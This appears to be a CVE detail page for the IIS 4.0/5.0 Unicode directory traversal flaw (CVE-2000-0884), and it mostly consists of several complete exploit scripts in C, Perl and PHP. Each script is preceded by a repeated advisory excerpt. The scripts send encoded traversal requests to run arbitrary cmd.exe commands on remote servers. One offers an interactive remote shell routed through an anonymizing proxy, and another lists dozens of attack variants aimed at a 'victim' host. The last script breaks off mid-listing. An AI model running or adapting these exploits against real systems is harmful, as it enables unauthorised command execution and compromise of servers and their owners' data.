CVE-2000-0884 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/wait.h> #include <unistd.h> #include <fcntl.h> #define SEND 100000 #define RECIVE 1000000 char *str_replace(char *rep, char *orig, char *string) { int len=strlen(orig); char buf[SEND]=""; char *pt=strstr(string,orig); strncpy(buf,string, pt-string ); strcat(buf,rep); strcat(buf,pt+strlen(orig)); strcpy(string,buf); return string; } /***************************************************************************/ int main(int argc,char *argv[]) { int sockfd, numbytes; char recv_buf[RECIVE]; int i; int port; char *uni[]={ "..%c0%af..", "..%c0%af../..%c0%af../..%c0%af..", "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..", "..%c1%1c..", "..%c1%1c../..%c1%1c../..%c1%1c..", "..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..", "..%252f..", "..%252f../..%252f../..%252f..", "..%252f..%252f..%252f..%252f..%252f..", "..%252e..", ".%252e..", "..%252e../..%252e../..%252e..", "..%252e..%252e..%252e..%252e..%252e..", "..%c0%9v..", "..%c0%9v../..%c0%9v../..%c0%9v..", "..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..", "..%c0%qf..", "..%c0%qf../..%c0%qf../..%c0%qf..", "..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..", "..%c1%8s..", "..%c1%8s../..%c1%8s../..%c1%8s..", "..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..", "..%c1%9c..", "..%c1%9c../..%c1%9c../..%c1%9c..", "..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..", "..%c1%pc..", "..%c1%pc../..%c1%pc../..%c1%pc..", "..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..", "..%255c..", "..%255c../..%255c../..%255c..", "..%255c..%255c..%255c..%255c..%255c..", "..%5c..", "..%5c../..%5c../..%5c..", "..%5c..%5c..%5c..%5c..%5c..", "..%%35c..", "..%%35c../..%%35c../..%%35c..", "..%%35c../..%%35c../..%%35c", //last news "..%%35c..%%35c..%%35c..%%35c..%%35c..", "..%%35%63..", "..%%35%63../..%%35%63../..%%35%63..", "..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..", "..%25%35%63..", "..%25%35%63../..%25%35%63../..%25%35%63..", "..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63.." }; char *path[]={ "/scripts/#uni/winnt/system32/cmd.exe?/c+", "/scripts/#uniwinnt/system32/cmd.exe?/c+", "/msadc/#uni/winnt/system32/cmd.exe?/c+", "/cgi-bin/#uni/winnt/system32/cmd.exe?/c+", "/samples/#uni/winnt/system32/cmd.exe?/c+", "/iisadmpwd/#uni/winnt/system32/cmd.exe?/c+", "/_vti_cnf/#uni/winnt/system32/cmd.exe?/c+", "/_vti_bin/#uni/winnt/system32/cmd.exe?/c+", "/exchange/#uni/winnt/system32/cmd.exe?/c+", "/pbserver/#uni/winnt/system32/cmd.exe?/c+", "/adsamples/#uni/winnt/system32/cmd.exe?/c+" }; int cont=0; char send_buf[SEND]=""; int x,j; int uni_len=sizeof(uni)/sizeof(char *); int path_len=sizeof(path)/sizeof(char *); struct hostent *he; struct sockaddr_in their_addr; if(argc!=4) { fprintf(stderr,"usage:%s <hostname> <port> <commands>\n",argv[0]); exit(1); } if((he=gethostbyname(argv[1]))==NULL) { perror("gethostbyname"); exit(1); } port=atoi(argv[2]); /***************************************************************************/ for(x=0;x<path_len;x++) for(j=0;j<uni_len;j++) { sprintf(send_buf,"GET %s%s HTTP/ 1.0\n\n", path[i],argv[3] ); str_replace(uni[j],"#uni",send_buf); if(cont==200) { sleep(3); cont=0; } cont++; sleep(1); if( fork()!=0) { if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family=AF_INET; their_addr.sin_port=htons(port); their_addr.sin_addr=*((struct in_addr*)he->h_addr); bzero(&(their_addr.sin_zero),8); if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1) { perror("connect"); exit(1); } if(send(sockfd,send_buf,SEND,0) ==-1) { perror("send"); exit(0); } if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1) { perror("recv"); exit(1); } recv_buf[numbytes]='\0'; //printf("%s\n",recv_buf); if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1) { perror("recv"); exit(1); } recv_buf[numbytes]='\0'; printf("\n-----------------------------------------------\n"); printf("String: %s\n\n",send_buf); printf("%s\n------------bytes recived: %d------------------\n",recv_buf,numbytes); close(sockfd); exit(0); } close(sockfd); while(waitpid(-1,NULL, WNOHANG) > 0); } printf("Done...\n"); return 0; }

source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. #!/usr/bin/perl # Very simple PERL script to test a machine for Unicode vulnerability. # Use port number with SSLproxy for testing SSL sites # Usage: unicodecheck IP:port # Only makes use of "Socket" library # Roelof Temmingh 2000/10/21 # [email protected] http://www.sensepost.com use Socket; # --------------init if ($#ARGV<0) {die "Usage: unicodecheck IP:port\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Testing $host:$port : "; $target = inet_aton($host); $flag=0; # ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 2 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------result if ($flag==1){print "Vulnerable\n";} else {print "Safe\n";} # ------------- Sendraw - thanx RFP [email protected] sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } # Spidermark: sensepostdata

// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. /* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */ /* coded by zipo */ /* to compile: cc -o iisuni iisuni.c */ /* made for all the lame populus :) */ #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <signal.h> #include <netinet/in.h> #include <netdb.h> #define BUFF_LEN 6000 #define HTTP " HTTP/1.0\r\n\r\n" #define GET "GET http://" /* this is the anonymous server used */ #define ANON "anon.free.anonymizer.com" /* this are all the types of bugs */ #define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+" #define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG4_STR "/" /* this is the IIS http server port */ #define HTTP_PORT 80 int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN]; int sck, i; if (argc < 3) bad_params (argv[0]); switch (atoi(argv[2])) { case 1: bug = BUG1_STR; break; case 2: bug = BUG2_STR; break; case 3: bug = BUG3_STR; break; case 4: bug = BUG4_STR; break; default: printf ("Number error\n"); exit(1); } while (1) { printf ("bash# "); fgets (cmd, sizeof(cmd), stdin); cmd[strlen(cmd)-1] = '\0'; if (strcmp(cmd, "exit")) { if (!strcmp(cmd, "clear")) { system("clear"); continue; } else if (!strcmp(cmd, "")) { continue; } else if (!strcmp(cmd, "?")) { printf ("Just you need to type in the prompt the M$DOS command\n"); printf ("to exit type \"exit\" :)\n"); continue; } /* prepare the string to be sent */ for (i=0;i<=strlen(cmd);i++) { if (cmd[i] == 0x20) cmd[i] = 0x2b; } sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP); /* get ip */ if ((he = gethostbyname (ANON)) == NULL) { herror ("host error"); exit (1); } /* setup port and other parameters */ sin.sin_port = htons (HTTP_PORT); sin.sin_family = AF_INET; memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length); /* create a socket */ if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) { perror ("socket() error"); exit (1); } /* connect to the sucker */ if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) { perror ("connect() error"); exit (1); } /* send the beautifull string */ write (sck, buffer, sizeof(buffer)); /* recive all ! :) */ read (sck, recbuffer, sizeof(recbuffer)); /* and print it */ recbuffer[strlen(recbuffer)-1]='\0'; printf ("\033[0;7m-------------------------------------Received-------------------- ---------------\n"); printf ("%s\n---------------------------------------Done--------------------------- ----------\n\033[7;0m", recbuffer); /* close the socket ... not needed any more */ close (sck); /* put zero's in the buffers */ bzero (buffer, sizeof(buffer)); bzero (recbuffer, sizeof(recbuffer)); } else { /* you type "exit" cya :) */ exit(0); } } } /* you miss a parameter :'-( */ int bad_params (char *prog_name) { fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name); fprintf (stdout, "-------------------------------------------------------\n"); fprintf (stdout, "<1> msadc\t"); fprintf (stdout, "<2> scripts\t"); fprintf (stdout, "<3> iisadmpwd\t"); fprintf (stdout, "<4> /\n"); fprintf (stdout, "-------------------------------------------------------\n"); exit (1); } /* EOF */

source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. #!php -q <? $vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+"; $vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+"; $vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+"; $vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+"; $vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"; $vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+"; $vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+"; $vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+"; $vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+"; $vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+"; $vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+"; $vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+"; $vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"; $vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[63]="/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+"; $vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; if(!isset($argv[1])) { echo "\n\n--------------------------------------------------------------------\n"; echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron ------\n"; echo "--------------------------------------------------------------------\n\n"; echo "Usage of the wicked device:\n"; echo $argv[0]." -t www.victim.vic\n"; echo $argv[0]." -t www.victim.vic -p proxy:port\n"; echo $argv[0]." www.victim.vic comand variant_number\n"; echo $argv[0]." -p proxy:port www.victim.vic comand variant_number\n"; echo "Options:\n"; echo "-t --> Test the vulnerability (Try known variants till find the good one)\n"; echo "-p --> Attack through proxy\n"; echo "\nUse Mode:\n1) Test the host and get the variants number in case vulnerability exists\n"; echo "2) Attack with command and variants number (optionaly you can use proxy)\n"; echo "Note : When you specify a command with spaces, replace spaces with low script \"_\" \n"; echo "and you must double the backslash \"\\\". \n Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n"; echo "Thanks to An-tonio for the proxy support.\n"; echo "Bug discover by Anonymous Post.\n"; echo "TYPE ".$argv[0]." spanish, for Spanish help.\n"; } else { if($argv[1]=="spanish") { echo "\n\n--------------------------------------------------------------------\n"; echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por BoloTron ----\n"; echo "--------------------------------------------------------------------\n\n"; echo "Uso del artefacto maligno :\n"; echo $argv[0]." -t www.victima.vic\n"; echo $argv[0]." -t www.victima.vic -p proxy:puerto\n"; echo $argv[0]." www.victima.vic comando n�_de_variante\n"; echo $argv[0]." -p proxy:port www.victima.vic comand n�_de_variante\n"; echo "Opciones:\n"; echo "-t --> Testea la vulnerabilidad, prueba todas las variantes hasta encontrar una buena.\n"; echo "-p --> Ataque a traves de proxy\n"; echo "\nModo de Empleo:\n1) Testear el host y anotar el numero de variante en caso de ser vulnerable\n"; echo "2) Atacar especificando comando y n� de variante (opcionalmente puedes especificar un proxy)\n"; echo "Nota : Cuando se especifica un comando en el que hay espacios hay que sustituirlos por un guion bajo _ \n"; echo "y las contrabarras hay que ponerlas dobles. \nEjemplo : ".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n"; echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n"; echo "Bug descubierto por aviso anonimo.\n"; exit; } if($argv[1]=="-t") { if ($argv[3]=="-p") { for($i=0;$i<70;$i++) { $prox=explode(":",$argv[4]); $comando="dir+c:\\"; $fp = fsockopen($prox[0], $prox[1]); if(!$fp) { echo "Conection failed...\n"; } else { fputs($fp,"GET http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n"); echo "Trying variant number ".$i." "; while(!feof($fp)) { $resul=$resul.fgets($fp,128); } if (ereg("<DIR>", $resul)) { echo "-----> Vulnerable!!\n"; exit; } else { echo "-----> NoT Vulnerable :(\n"; } } fclose($fp); } } else { for($i=0;$i<70;$i++) { $port=80; $comando="dir+c:\\"; $fp = fsockopen($argv[2], $port); if(!$fp) { echo "Conection failed...\n"; } else { fputs($fp,"GET ".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n"); echo "Trying variant number ".$i." "; while(!feof($fp)) { $resul=$resul.fgets($fp,128); } if (ereg("<DIR>", $resul)) { echo "-----> vulnerable!!\n"; exit; } else { echo "-----> No Vulnerable :(\n"; } } fclose($fp); } } } else { if($argv[1]=="-p") { $prox=explode(":",$argv[2]); $port=$prox[1]; $comando=ereg_replace("_","+",$argv[4]); $fp = fsockopen($prox[0], $port); if(!$fp) { echo "Conection failed.\n"; } else { fputs($fp,"GET http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0\n\n"); while(!feof($fp)) { echo fgets($fp,128); } } fclose($fp); } else { $port=80; $comando=ereg_replace("_","+",$argv[2]); $fp = fsockopen($argv[1], $port); if(!$fp) { echo "Conection failed.\n"; } else { fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0\n\n"); while(!feof($fp)) { echo fgets($fp,128); } } fclose($fp); } } } ?>

source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. ########################################################## # Spawn Ms-Doz-like Shell on MicrosoZ IIS # on IIS vulnerable servers using 450 ways # (like Unicode, Codered, corrupt string and Backdoor) # NOW SUPPORT ALL UNIX SYSTEM ! # Use port number with SSLproxy for testing SSL sites # Andrea Spabam 2001 GPL2 or highter # [email protected] # This Script is currently under development # link to http://spabam.da.ru to get latest version ########################################################## use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U[1] = "/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[2] = "/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[3] = "/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[4] = "/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[5] = "..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[6] = "/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[7] = "/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[8] = "/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[9] = "/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[10] = "/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[11] = "/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[12] = "/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[13] = "/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[14] = "/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[15] = "/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[16] = "/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[17] = "/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[18] = "/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[19] = "/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[20] = "/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[21] = "/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[22] = "/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[23] = "/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[24] = "/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[25] = "/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[26] = "/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[27] = "/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[28] = "/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[29] = "/root.exe?/c+"; $U[30] = "/cmd.exe?/c+"; $U[31] = "/sensepost.exe?/c+"; $U[32] = "/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[33] = "/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[34] = "/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[35] = "/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[36] = "/MSADC/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[37] = "/MSADC/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[38] = "/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[39] = "/MSADC/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[40] = "/MSADC..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[41] = "/MSADC/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[42] = "/MSADC/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[43] = "/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[44] = "/MSADC/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[45] = "/MSADC/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[46] = "/MSADC/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[47] = "/MSADC/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[48] = "/MSADC/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[49] = "/MSADC/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[50] = "/MSADC/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[51] = "/MSADC/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[52] = 